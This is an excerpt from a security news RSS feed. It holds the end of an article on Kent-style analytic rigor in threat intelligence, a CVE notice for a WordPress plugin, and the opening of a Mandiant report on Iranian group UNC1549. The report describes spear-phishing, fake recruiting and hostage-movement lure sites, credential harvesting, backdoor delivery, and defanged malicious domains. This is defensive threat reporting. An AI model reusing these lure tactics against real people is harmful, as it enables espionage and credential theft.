distinguishes operational missiles from support equipment?</li><li>What is the time horizon before the threat becomes operational?</li><li>What assumptions could cause overreaction or underreaction?</li></ul><h4>Example 2: SolarWinds exposed a collection gap in trusted software supply chains</h4><ul><li><strong>Claim:</strong> SolarWinds showed that trusted software updates can create visibility gaps not solved by ordinary IOC matching.</li><li><strong>Evidence:</strong> CISA and CrowdStrike reporting describe malicious code inserted into a trusted software build and update process.</li><li><strong>Source access:</strong> Government advisory and vendor technical analysis.</li><li><strong>Assessment:</strong> The collection gap included build integrity, signed software provenance, vendor trust relationships, and anomalous post-update behavior.</li><li><strong>Confidence in assessment:</strong> High for the SolarWinds-specific gap; moderate for generalizing across all software supply-chain risk.</li><li><strong>Confidence basis:</strong> Source access: government advisory and vendor technical analysis; Source reliability: established; Information credibility: corroborated for SolarWinds compromise mechanism, inferred for broader supply-chain lessons; Author verification: public reports checked.</li><li><strong>Sources:</strong> <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a">CISA AA20–352A</a>; <a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/">CrowdStrike, SUNSPOT</a>.</li><li><strong>Qualifier / limitation:</strong> A supply-chain compromise does not imply every similar vendor relationship is equally exposed.</li></ul><h3>7. Analytic Integrity in CTI</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SjsMMnm-vjqrTKTrKl-QUA.png"></figure><p>CTI reporting often mixes telemetry, malware family names, vendor clusters, infrastructure, attribution, and intent. Analytic integrity means refusing to compress those into a single confident story unless the evidence supports it.</p><h4>Example 1: APT1 victimology supports targeting assessment, not observed reconnaissance</h4><ul><li><strong>Claim:</strong> APT1 victimology supports a target-selection assessment, but does not directly prove specific reconnaissance methods.</li><li><strong>Evidence:</strong> Mandiant reported that APT1 compromised at least 141 organizations across many industries and tied the victimology to Chinese strategic priorities.</li><li><strong>Source access:</strong> Vendor incident response and technical reporting; public readers do not see the full underlying evidence.</li><li><strong>Assessment:</strong> Victimology supports deliberate campaign-level targeting, while individual intrusion reconnaissance remains a collection gap unless separate evidence exists.</li><li><strong>Confidence in assessment:</strong> Moderate.</li><li><strong>Confidence basis:</strong> Source access: vendor incident response reporting; Source reliability: established vendor; Information credibility: credible but limited public raw data; Author verification: public report checked, underlying case data not available.</li><li><strong>Source:</strong> <a href="https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf">Mandiant, APT1 report</a>.</li><li><strong>Qualifier / limitation:</strong> Victimology alignment is not proof of tasking or pre-compromise research for each victim.</li></ul><p><strong>Kent-style wording:</strong></p><ul><li><strong>Reported:</strong> APT1 compromised a large victim set across multiple sectors.</li><li><strong>Assessed by source:</strong> Victim sectors aligned with strategic economic and policy interests.</li><li><strong>Inferred by this article:</strong> The campaign likely involved deliberate target selection.</li><li><strong>Collection gap:</strong> The exact reconnaissance method before each intrusion is not directly shown by victimology alone.</li></ul><h4>Example 2: SUNBURST, GoldMax, Sibot, and StellarParticle should not be flattened into one label</h4><ul><li><strong>Claim:</strong> SolarWinds-related reporting requires careful separation of malware, tools, vendor clusters, campaign names, attribution, and intent.</li><li><strong>Evidence:</strong> Microsoft described GoldMax, GoldFinder, and Sibot as later-stage NOBELIUM tools; CrowdStrike used StellarParticle for related follow-on intrusion activity.</li><li><strong>Source access:</strong> Vendor technical analysis based on proprietary telemetry and incident response.</li><li><strong>Assessment:</strong> Treating SUNBURST, SUNSPOT, GoldMax, Sibot, NOBELIUM, StellarParticle, APT29, and COZY BEAR as interchangeable would collapse different analytic layers.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: vendor technical reporting; Source reliability: established vendors; Information credibility: credible and label-specific; Author verification: public reports checked, cross-vendor clustering not independently verified.</li><li><strong>Sources:</strong> <a href="https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/">Microsoft, GoldMax, GoldFinder, and Sibot</a>; <a href="https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/">CrowdStrike, StellarParticle observations</a>.</li><li><strong>Qualifier / limitation:</strong> Cross-vendor clustering may be valid, but it should be stated as an assessment with evidence, not assumed from name proximity.</li></ul><p><strong>Kent-style separation:</strong></p><ul><li><strong>Malware/tool:</strong> SUNBURST, SUNSPOT, GoldMax, GoldFinder, Sibot.</li><li><strong>Vendor cluster:</strong> NOBELIUM, StellarParticle, APT29-style community labels.</li><li><strong>Campaign:</strong> SolarWinds-related intrusion activity.</li><li><strong>Attribution:</strong> assessed state-linked responsibility.</li><li><strong>Intent:</strong> intelligence collection, access development, or other objectives.</li></ul><h3>Cognitive Biases CTI Analysts Should Name</h3><p>Kent-style discipline is partly about fighting predictable analytic failure modes. The CIA tradecraft primer emphasizes structured techniques because analysts working with incomplete and ambiguous information are vulnerable to cognitive bias (<a href="https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf">CIA, A Tradecraft Primer</a>).</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_MKrRprTzQEF_CJcS2EefA.png"></figure><p><strong>Common CTI bias patterns:</strong></p><ul><li><strong>Confirmation bias:</strong> treating every new domain, malware string, or infrastructure overlap as support for the actor hypothesis already in the analyst’s head.</li><li><strong>Anchoring:</strong> giving too much weight to the first vendor label or first incident-response theory, even after better evidence appears.</li><li><strong>Mirror imaging:</strong> assuming the adversary values risk, cost, publicity, or operational tempo the same way the defender does.</li><li><strong>Availability bias:</strong> over-weighting the most recent high-profile campaign because it is memorable, not because it best explains the evidence.</li><li><strong>Groupthink:</strong> converging on a shared attribution label because peer teams or trusted vendors use it, without separately testing the underlying evidence.</li></ul><p>Structured analytic techniques are useful because they force friction into the analysis. Alternative hypotheses, key assumptions checks, evidence matrices, and premortems are not bureaucratic decoration; they are bias controls. In CTI, the most practical bias check is simple: before publishing an attribution, write down the strongest evidence against it.</p><h3>Where ATT&amp;CK and the Pyramid of Pain Fit</h3><p>MITRE ATT&amp;CK gives CTI teams a structured vocabulary for adversary tactics and techniques based on real-world observations (<a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a>). The Pyramid of Pain, associated with David Bianco, explains why higher-level behavioral indicators and TTPs are usually harder for adversaries to change than hashes, IPs, and domains.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Avn2HMvyvckpmQTWnsCEiQ.png"></figure><p><strong>Kent-style discipline does not replace these frameworks. It tells analysts how to write about them:</strong></p><ul><li><strong>Hash, IP, domain:</strong> usually source-observed or reported technical indicators; useful but often perishable and weak for attribution.</li><li><strong>Host or network artifact:</strong> stronger than a raw IOC when tied to execution context, but still may not identify an actor.</li><li><strong>ATT&amp;CK technique:</strong> a behavioral claim. It should be mapped only when evidence supports the behavior, not because a malware family is commonly associated with the technique.</li><li><strong>Tool:</strong> stronger than a hash when supported by reverse engineering, but tool reuse and leaks can complicate attribution.</li><li><strong>TTP pattern:</strong> stronger for clustering when repeated across time, victims, infrastructure, and tooling.</li><li><strong>Actor attribution and intent:</strong> assessed judgments. ATT&amp;CK mapping can support them, but does not prove them by itself.</li></ul><p>Example: “The intrusion used credential dumping” is a technique-level claim. “This was APT28” is an attribution claim. “The objective was strategic intelligence collection” is an intent claim. They need different evidence and different confidence statements.</p><h3>Kent-Style Checklist</h3><p>Use this checklist before publishing an analytic judgment:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kZv6tiN5XkW8yiGJzvSiSA.png"></figure><ol><li><strong>Question:</strong> What decision or intelligence requirement does this answer?</li><li><strong>Claim:</strong> What exactly are you asserting?</li><li><strong>Evidence:</strong> What is source-observed, reported, assessed, or inferred?</li><li><strong>Source access:</strong> Did the source have telemetry, malware samples, logs, imagery, victim access, official records, or secondhand reporting?</li><li><strong>Source reliability:</strong> Is the source established, unknown, contested, or mixed?</li><li><strong>Information credibility:</strong> Is the information corroborated, single-source, inferred, or disputed?</li><li><strong>Author verification:</strong> What did you personally verify?</li><li><strong>Assumptions:</strong> What must be true for the judgment to hold?</li><li><strong>Probability:</strong> How likely is the judgment?</li><li><strong>Confidence:</strong> How strong is the evidence base?</li><li><strong>Alternatives:</strong> What else could explain the same evidence?</li><li><strong>Discrimination:</strong> What evidence would separate the hypotheses?</li><li><strong>Gaps:</strong> What do we still not know?</li><li><strong>Dissent:</strong> Are there credible disagreements or minority views?</li><li><strong>Change indicators:</strong> What would cause the assessment to change?</li></ol><h3>Practical Analyst Template</h3><pre>Product title:<br>Primary intelligence requirement:<br>Decision context:<br>Analyst:<br>Date:<br>Bottom line:<br>- Assessment:<br>- Probability language:<br>- Confidence:<br>- Scope and time horizon:<br>Claim:<br>- Exact claim:<br>- What this claim does not say:<br>Evidence base:<br>- Author-observed:<br>- Source-observed:<br>- Reported:<br>- Assessed by source:<br>- Inferred by analyst:<br>Source quality:<br>- Source access:<br>- Source reliability:<br>- Information credibility:<br>- Corroboration:<br>- Author verification:<br>Assumptions:<br>- Assumption 1:<br>- Assumption 2:<br>- Assumption sensitivity:<br>Alternative hypotheses:<br>- H1 (primary):<br>- H2 (alternative):<br>- H3 (alternative, if needed):<br>- Discriminating evidence:<br>- Current preferred hypothesis and why:<br>Confidence basis:<br>- Collection strength:<br>- Collection weakness:<br>- Analytic uncertainty:<br>- Dissent or caveats:<br>Collection requirements:<br>- Requirement 1:<br>- Requirement 2:<br>- Requirement 3:<br>Indicators to watch:<br>- Indicator that would increase confidence:<br>- Indicator that would decrease confidence:<br>- Indicator that would change the assessment:<br>Defensive or policy implications:<br>- Tactical:<br>- Operational:<br>- Strategic:</pre><h3>Conclusion</h3><p>Sherman Kent’s analytic legacy is not a historical curiosity. It is a practical discipline for writing intelligence under uncertainty. For CTI analysts, the lesson is especially important because cyber reporting routinely combines artifacts, telemetry, malware names, infrastructure links, vendor clusters, government statements, victimology, attribution, and intent.</p><p>The real-world examples show why the discipline matters:</p><ul><li>Cuban Missile Crisis imagery shows policy-relevant intelligence narrowing uncertainty without replacing policy judgment.</li><li>Iraq WMD analysis shows the danger of converting assumptions into confident conclusions.</li><li>The 2007 Iran NIE shows the value of decomposing a broad issue into separate judgments with separate confidence levels.</li><li>9/11 warning analysis shows why alternative hypotheses matter before a threat is obvious.</li><li>SolarWinds shows why CTI must separate technical fact, tooling, vendor labels, attribution, and intent.</li><li>APT1 victimology shows how to infer target selection without pretending to observe reconnaissance.</li><li>NotPetya shows why destructive effect and strategic intent must be assessed separately.</li></ul><p>Used this way, Kent-style analytic discipline helps CTI analysts produce clearer estimates, better collection requirements, more defensible confidence statements, and fewer overclaims.</p><h3>References</h3><ul><li>CIA, Sherman Kent, Words of Estimative Probability: <a href="https://www.cia.gov/resources/csi/studies-in-intelligence/archives/vol-8-no-4/words-of-estimative-probability/">https://www.cia.gov/resources/csi/studies-in-intelligence/archives/vol-8-no-4/words-of-estimative-probability/</a></li><li>CIA, Words of Estimative Probability PDF: <a href="https://www.cia.gov/resources/csi/static/Words-of-Estimative-Probability.pdf">https://www.cia.gov/resources/csi/static/Words-of-Estimative-Probability.pdf</a></li><li>CIA, The Intelligence Process: A Digest from Strategic Intelligence by Sherman Kent: <a href="https://www.cia.gov/readingroom/document/cia-rdp78-04718a000600100003-3">https://www.cia.gov/readingroom/document/cia-rdp78-04718a000600100003-3</a></li><li>CIA, Sherman Kent and the Profession of Intelligence Analysis: <a href="https://www.cia.gov/resources/csi/static/Kent-Profession-Intel-Analysis.pdf">https://www.cia.gov/resources/csi/static/Kent-Profession-Intel-Analysis.pdf</a></li><li>ODNI, Intelligence Community Directive 203: Analytic Standards: <a href="https://www.dni.gov/files/documents/ICD/ICD-203.pdf">https://www.dni.gov/files/documents/ICD/ICD-203.pdf</a></li><li>CIA, A Tradecraft Primer: Structured Analytic Techniques for Improving Intelligence Analysis: <a href="https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf">https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf</a></li><li>Office of the Historian, Cuban Missile Crisis chronology and U-2 collection: <a href="https://history.state.gov/historicaldocuments/frus1961-63v11/d16">https://history.state.gov/historicaldocuments/frus1961-63v11/d16</a></li><li>National Archives, Aerial Photograph of Missiles in Cuba: <a href="https://www.archives.gov/milestone-documents/aerial-photograph-of-missiles-in-cuba">https://www.archives.gov/milestone-documents/aerial-photograph-of-missiles-in-cuba</a></li><li>DIA, Cuban Missile Crisis U-2 photo record: <a href="https://www.dia.mil/News-Features/Photo-Gallery/igphoto/2000948884/">https://www.dia.mil/News-Features/Photo-Gallery/igphoto/2000948884/</a></li><li>WMD Commission report index: <a href="https://govinfo.library.unt.edu/wmd/report/index.html">https://govinfo.library.unt.edu/wmd/report/index.html</a></li><li>WMD Commission report PDF: <a href="https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf">https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf</a></li><li>WMD Commission transmittal letter: <a href="https://govinfo.library.unt.edu/wmd/report/transmittal_letter.html">https://govinfo.library.unt.edu/wmd/report/transmittal_letter.html</a></li><li>Senate Select Committee conclusions on Iraq WMD intelligence via GlobalSecurity mirror: <a href="https://www.globalsecurity.org/intell/library/congress/2004_rpt/iraq-wmd_intell_09jul2004_conclusions.htm">https://www.globalsecurity.org/intell/library/congress/2004_rpt/iraq-wmd_intell_09jul2004_conclusions.htm</a></li><li>9/11 Commission Report PDF: <a href="https://www.9-11commission.gov/report/911Report.pdf">https://www.9-11commission.gov/report/911Report.pdf</a></li><li>Office of Justice Programs, 9/11 Commission Report summary: <a href="https://www.ojp.gov/ncjrs/virtual-library/abstracts/911-commission-report-executive-summary">https://www.ojp.gov/ncjrs/virtual-library/abstracts/911-commission-report-executive-summary</a></li><li>ODNI, Iran: Nuclear Intentions and Capabilities, 2007 NIE: <a href="https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf">https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf</a></li><li>CIA CSI, CIA Support to Policymakers: The 2007 NIE on Iran’s Nuclear Intentions and Capabilities: <a href="https://www.cia.gov/resources/csi/books-monographs/cia-support-to-policymakers-the-2007-nie-on-irans-nuclear-intentions-and-capabilities/">https://www.cia.gov/resources/csi/books-monographs/cia-support-to-policymakers-the-2007-nie-on-irans-nuclear-intentions-and-capabilities/</a></li><li>Mandiant, APT1: <a href="https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf">https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf</a></li><li>Google Cloud / Mandiant, APT28: <a href="https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operations">https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operations</a></li><li>CISA, SolarWinds AA20–352A: <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a">https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a</a></li><li>CrowdStrike, SUNSPOT: <a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/">https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/</a></li><li>Microsoft, GoldMax, GoldFinder, and Sibot: <a href="https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/">https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/</a></li><li>CrowdStrike, StellarParticle observations: <a href="https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/">https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/</a></li><li>MITRE ATT&amp;CK: <a href="https://attack.mitre.org/">https://attack.mitre.org/</a></li><li>MITRE, MITRE ATT&amp;CK overview: <a href="https://www.mitre.org/focus-areas/cybersecurity/mitre-attack">https://www.mitre.org/focus-areas/cybersecurity/mitre-attack</a></li><li>Sqrrl / David Bianco, A Framework for Cyber Threat Hunting Part 1: The Pyramid of Pain: <a href="https://www.threathunting.net/files/A%20Framework%20for%20Cyber%20Threat%20Hunting%20Part%201_%20The%20Pyramid%20of%20Pain%20_%20Sqrrl.pdf">https://www.threathunting.net/files/A%20Framework%20for%20Cyber%20Threat%20Hunting%20Part%201_%20The%20Pyramid%20of%20Pain%20_%20Sqrrl.pdf</a></li><li>Mandiant, WannaCry malware profile: <a href="https://cloud.google.com/blog/topics/threat-intelligence/wannacry-malware-profile">https://cloud.google.com/blog/topics/threat-intelligence/wannacry-malware-profile</a></li><li>Mandiant, WannaCry use of EternalBlue: <a href="https://cloud.google.com/blog/topics/threat-intelligence/smb-exploited-wannacry-use-of-eternalblue/">https://cloud.google.com/blog/topics/threat-intelligence/smb-exploited-wannacry-use-of-eternalblue/</a></li><li>DOJ, North Korean regime-backed programmer charged in cyber attacks including WannaCry 2.0: <a href="https://www.justice.gov/archives/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">https://www.justice.gov/archives/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and</a></li><li>Microsoft, NotPetya technical analysis: <a href="https://www.microsoft.com/security/blog/2017/10/03/advanced-threat-analytics-security-research-network-technical-analysis-notpetya/">https://www.microsoft.com/security/blog/2017/10/03/advanced-threat-analytics-security-research-network-technical-analysis-notpetya/</a></li><li>Cisco Talos, The MeDoc Connection: <a href="https://blogs.cisco.com/security/talos/the-medoc-connection">https://blogs.cisco.com/security/talos/the-medoc-connection</a></li><li>UK Government, Foreign Office Minister condemns Russia for NotPetya attacks: <a href="https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacks">https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacks</a></li><li>White House, Statement from the Press Secretary on NotPetya: <a href="https://trumpwhitehouse.archives.gov/briefings-statements/statement-press-secretary-25/">https://trumpwhitehouse.archives.gov/briefings-statements/statement-press-secretary-25/</a></li><li>DOJ, Six Russian GRU officers charged in connection with destructive malware including NotPetya: <a href="https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and">https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and</a></li></ul><h3>Follow for practical cybersecurity research</h3><p>If you’re interested in <strong>Offensive security,</strong> <strong>AI security, real-world attack simulations, CTI, and detection engineering</strong> — this is exactly what I focus on.</p><p>Stay connected:</p><p>→ <strong>Subscribe on Medium:</strong> <a href="https://medium.com/@1200km">medium.com/@1200km</a><br>→ <strong>Connect on LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">andrey-pautov</a><br>→ <strong>GitHub — tools &amp; labs:</strong> <a href="https://github.com/anpa1200">github.com/anpa1200</a><br>→ <strong>Contact:</strong> <a href="mailto:1200km@gmail.com">1200km@gmail.com</a></p><h4>Andrey Pautov</h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=33142ad7553b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b">Applying Sherman Kent’s Analytic Discipline to CTI: A Practical Analyst Guide</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-7665 | wpdevteam Essential Addons for Elementor Plugin up to 6.6.4 on WordPress Elementor Template ajax_load_more authorization (EUVD-2026-34950)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in wpdevteam Essential Addons for Elementor Plugin up to 6.6.4 on WordPress. Affected by this vulnerability is the function ajax_load_more of the component Elementor Template Handler. Performing a manipulation results in authorization bypas...]]></description>
<link>https://tsecurity.de/de/3579759/sicherheitsluecken/cve-2026-7665-wpdevteam-essential-addons-for-elementor-plugin-up-to-664-on-wordpress-elementor-template-ajaxloadmore-authorization-euvd-2026-34950/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579759/sicherheitsluecken/cve-2026-7665-wpdevteam-essential-addons-for-elementor-plugin-up-to-664-on-wordpress-elementor-template-ajaxloadmore-authorization-euvd-2026-34950/</guid>
<pubDate>Sun, 07 Jun 2026 19:38:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/wpdevteam:essential_addons_for_elementor_plugin">wpdevteam Essential Addons for Elementor Plugin up to 6.6.4</a> on WordPress. Affected by this vulnerability is the function <code>ajax_load_more</code> of the component <em>Elementor Template Handler</em>. Performing a manipulation results in authorization bypass.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-7665">CVE-2026-7665</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[When Cats Fly: Suspected Iranian Threat Actor UNC1549 Targets Israeli and Middle East Aerospace and Defense Sectors]]></title>
<description><![CDATA[Written by: Ofir Rozmann, Chen Evgi, Jonathan Leathery

 
Today Mandiant is releasing a blog post about suspected Iran-nexus espionage activity targeting the aerospace, aviation and defense industries in Middle East countries, including Israel and the United Arab Emirates (UAE) and potentially Tu...]]></description>
<link>https://tsecurity.de/de/3578876/it-security-nachrichten/when-cats-fly-suspected-iranian-threat-actor-unc1549-targets-israeli-and-middle-east-aerospace-and-defense-sectors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578876/it-security-nachrichten/when-cats-fly-suspected-iranian-threat-actor-unc1549-targets-israeli-and-middle-east-aerospace-and-defense-sectors/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Ofir Rozmann, Chen Evgi, Jonathan Leathery</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>Today Mandiant is releasing a blog post about <strong>suspected Iran-nexus espionage activity targeting the aerospace, aviation and defense industries in Middle East</strong> countries, including Israel and the United Arab Emirates (UAE) and potentially Turkey, India, and Albania. </p>
<p><strong>Mandiant attributes this activity with moderate confidence to the Iranian actor UNC1549</strong>, which overlaps with <strong>Tortoiseshell</strong>—a threat actor that has been publicly <a href="https://www.wired.com/story/facebook-iran-espionage-catfishing-us-military/" rel="noopener" target="_blank"><u>linked</u></a> to <strong>Iran’s Islamic Revolutionary Guard Corps (IRGC)</strong>. Tortoiseshell has previously attempted to compromise supply chains by targeting defense contractors and IT providers.  </p>
<p>The<strong> potential link between this activity and the Iranian IRGC</strong> is noteworthy given the focus on defense-related entities and the recent tensions with Iran in light of the Israel-Hamas war. Notably, Mandiant observed an<strong> Israel-Hamas war-themed campaign that masquerades as the “Bring Them Home Now” movement</strong>, which calls for the return of the Israelis kidnapped and held hostage by Hamas.</p>
<p>This suspected UNC1549 activity has been active since at least June 2022 and is still ongoing as of February 2024. While regional in nature and focused mostly in the Middle East, the targeting includes entities operating worldwide.</p>
<p>Mandiant observed this campaign<strong> </strong>deploy<strong> multiple evasion techniques</strong> to mask their activity, most prominently the <strong>extensive use of Microsoft Azure cloud infrastructure</strong> as well as <strong>social engineering schemes to disseminate two unique backdoors: MINIBIKE and MINIBUS</strong>.</p>
<p>This blog post details the suspected UNC1549 operations since June 2022, the ongoing development of their proprietary malware, their network of over 125 Azure command-and-control (C2) subdomains, and their attack lifecycle, which includes tactics, techniques, and procedures (TTPs) Mandiant has not previously seen deployed by Iran.</p>
<h2>Attribution</h2>
<p>Mandiant assesses with moderate confidence that this activity has ties to UNC1549, an Iran-based espionage group, which overlaps with activities publicly known as <a href="https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf" rel="noopener" target="_blank"><u>Tortoiseshell</u></a> and <a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide" rel="noopener" target="_blank"><u>Smoke Sandstorm/BOHRIUM</u></a>. </p>
<p>Namely, a fake recruiting website (1stemployer[.]com) was observed hosting a MINIBUS payload in November 2023. The template used for the fake recruiting website had been used previously in another fake recruiting website, careers-finder[.]com, which was used by UNC1549. </p>
<ul>
<li>
<p>In this campaign, the MINIBUS backdoor was hosted on a fake job website (1stemployer[.]com) using the exact same written contents as careers-finder[.]com used by UNC1549 in early 2022, for example, “After considering the career and education background we introduce you to the employer companies which are looking for the indicated skills and expertise.”</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig1.max-1000x1000.png" alt="Fake job website 1stemployer[.]com deploying a template similar to a previous UNC1549 website">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fzpdl">Figure 1: Fake job website 1stemployer[.]com deploying a template similar to a previous UNC1549 website</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>In addition, like in previous UNC1549 activities, this campaign leveraged .NET applications to deliver the malware—this time the attackers implemented it by using a fake Hamas-affiliated application to deliver the MINIBUS backdoor.</li>
</ul>
<p><strong>According to public </strong><a href="https://www.wired.com/story/facebook-iran-espionage-catfishing-us-military/" rel="noopener" target="_blank"><strong><u>reporting</u></strong></a><strong>, Tortoiseshell, which is tied to UNC1549, is potentially linked to the IRGC</strong>.</p>
<p>In addition, <strong>the focused targeting of Middle East entities</strong> affiliated with the aerospace and defense sectors<strong> is consistent with other Iran-nexus clusters of activity</strong>, some of which are affiliated with the IRGC as well.</p>
<h2>Outlook and Implications</h2>
<p>Mandiant research indicates this campaign remains active as of February 2024, and targeted entities are related to defense, aerospace, and aviation in the Middle East, particularly in Israel and the UAE and potentially in Turkey, India, and Albania. </p>
<p>The intelligence collected on these entities is of relevance to strategic Iranian interests and may be leveraged for espionage as well as kinetic operations. This is further supported by the potential ties between UNC1549 and the IRGC.</p>
<p>The evasion methods deployed in this campaign, namely the tailored job-themed lures combined with the use of cloud infrastructure for C2, may make it challenging for network defenders to prevent, detect, and mitigate this activity. The intelligence and indicators provided in this report may support these efforts and enhance them.</p>
<h2>Attack Lifecycle</h2>
<p>This suspected UNC1549 campaign uses two primary methods to achieve initial access to the targets: spear-phishing and credential harvesting. A typical chain of attack consists of several stages:</p>
<ul>
<li>
<p><strong>Spear-phishing </strong>emails or social media correspondence, disseminating links to<strong> fake websites containing Israel-Hamas related content or fake job offers</strong>. The websites would eventually lead to downloading a malicious payload.</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig2.max-1000x1000.png" alt="Fake website posing as the “Bring Them Home Now” movement, calling for the return of Israelis kidnapped by Hamas">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1s7sn">Figure 2: Fake website posing as the “Bring Them Home Now” movement, calling for the return of Israelis kidnapped by Hamas</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>
<ul>
<li>The fake job offers were for <strong>tech and defense-related positions</strong>, specifically in the aviation, aerospace, or thermal imaging sectors. </li>
<li>
<p>Mandiant also observed some of the fake job websites that hosted malicious payloads were also used during 2023 to <strong>harvest credentials</strong>.</p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig3-fig6.max-1000x1000.png" alt="Fake login page masquerading as the aerospace company Boeing">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1s7sn">Figure 3: Fake login page masquerading as the aerospace company Boeing</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><strong>Payload delivery</strong>, downloaded from the previously mentioned websites to the target’s computer. The payload is a compressed archive that typically includes two main bundles:</li>
<li>
<ul>
<li>MINIBIKE or MINIBUS—two unique backdoors deployed at least since 2022 (MINIBIKE) and 2023 (MINIBUS), providing full backdoor functionality (see the Technical Appendix for more information).</li>
<li>
<p>A benign lure in the form of an application like OneDrive (MINIBIKE) or, in the case of MINIBUS, a custom application presenting content related to Israelis kidnapped by Hamas hosted on the fake website birngthemhomenow[.]co[.]il mentioned previously.</p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig4-fig13-blurred.max-1000x1000.png" alt="Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6skve">Figure 4: Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
